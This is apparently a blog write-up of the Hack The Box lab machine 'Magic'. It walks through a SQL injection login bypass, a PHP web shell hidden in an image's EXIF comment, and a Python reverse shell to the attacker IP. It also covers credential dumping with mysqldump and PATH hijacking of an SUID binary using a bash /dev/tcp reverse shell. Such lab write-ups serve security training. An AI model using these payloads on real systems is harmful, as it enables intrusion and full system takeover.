Posts Magic Writeup [HTB]
Post
Cancel

Magic Writeup [HTB]

Magic is a linux machine rated as medium from Hack The Box, it consists on exploiting an arbitrary file upload and then perform a path hijacking attack to obtain root.

Enumeration

Running nmap :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
   nmap -sC -sV -o nmap.txt 10.10.10.185
   Nmap scan report for 10.10.10.185
Host is up (0.035s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browsing to port 80 we find the following page : Web

There is a login form we can bypass with sql injection : SQL

Then, after being logged in there is an image upload utility:

upload

Exploitation

We will use exiftool to embed a php web shell inside a png image :

1
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' minion.jpg

Then we rename the image to minion.php.jpg and upload it , we can access the webshell browsing to http://10.10.10.185/images/uploads/minion.php.jpg?cmd=

Now we can obtain a shell using a python3 reverse shell:

1
http://10.10.10.185/images/uploads/minion.php.jpg?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.116",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And we get a reverse connection as www-data:

1
2
3
4
5
6
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.116] from (UNKNOWN) [10.10.10.185] 47460
/bin/sh: 0: cant access tty; job control turned off
$ whoami
www-data

Now we can upgrade the shell to an interactive shell:

1
2
3
4
5
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm

Some database credentials were found for Magic db inside /var/www/Magic/db.php5

1
2
3
4
5
6
7
8
www-data@ubuntu:/var/www/Magic$ cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

We can now read the database using mysqldump :

1
2
3
4
5
6
7
mysqldump -B Magic -u theseus -p
Enter password:
-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
-- Host: localhost    Database: Magic
-- Server version       5.7.29-0ubuntu0.18.04.1
-- Dumping data for table `login`
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');

With this password we can access user Theseus :

1
2
3
www-data@ubuntu:/var/www/Magic$ su theseus
Password:
theseus@ubuntu:/var/www/Magic$

Then, in order to get a more stable shell we can upload our id_rsa.pub key and in .ssh directory of theseus renaming it to authorized_keys to log in through ssh service :

1
ssh theseus@10.10.10.185 -i id_rsa

Privilege escalation

Searching for SUID files we found sysinfo which really caught my attention :

1
2
theseus@ubuntu:~$ find / -perm -u=s -type f 2>/dev/null
/bin/sysinfo

Reading its contents we discovered it is vulnerable to a path hijacking attack because it is running some binaries without using its full path:

1
2
3
4
5
6
7
8
theseus@ubuntu:~$ strings /bin/sysinfo
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
====================MEM Usage=====================

We will create a malicious fdisk file inside /tmp which will contain a bash reverse shell, then we will change the path:

1
2
3
4
5
6
7
theseus@ubuntu:~$ cd /tmp
theseus@ubuntu:/tmp$ nano fdisk
theseus@ubuntu:/tmp$ cat fdisk
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.116/1234 0>&1
theseus@ubuntu:/tmp$ chmod +x fdisk
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH

Finally, running sysinfo again gives back a root reverse shell

1
2
3
4
5
6
7
8
9
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.116] from (UNKNOWN) [10.10.10.185] 43596
root@ubuntu:/tmp# whoami
whoami
root
root@ubuntu:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
This post is licensed under CC BY 4.0 by the author.